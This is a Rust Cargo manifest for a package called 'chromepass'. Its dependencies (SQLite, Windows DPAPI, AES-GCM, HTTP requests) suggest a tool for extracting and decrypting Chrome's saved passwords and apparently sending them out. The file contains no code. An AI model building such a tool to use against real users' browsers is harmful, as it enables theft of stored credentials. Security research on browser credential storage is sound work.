[package]
name = "chromepass"
version = "0.1.0"
authors = ["darkArp <mario@whitehathacking.tech>"]
edition = "2018"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[dependencies]
sqlite = "*"
json = "*"
winapi = { version = "0.3.0", features = ["dpapi", "errhandlingapi"] }
base64 = "*"
aes-gcm = "*"
reqwest = { version = "*", features = ["blocking", "json"] }
serde_json = "*"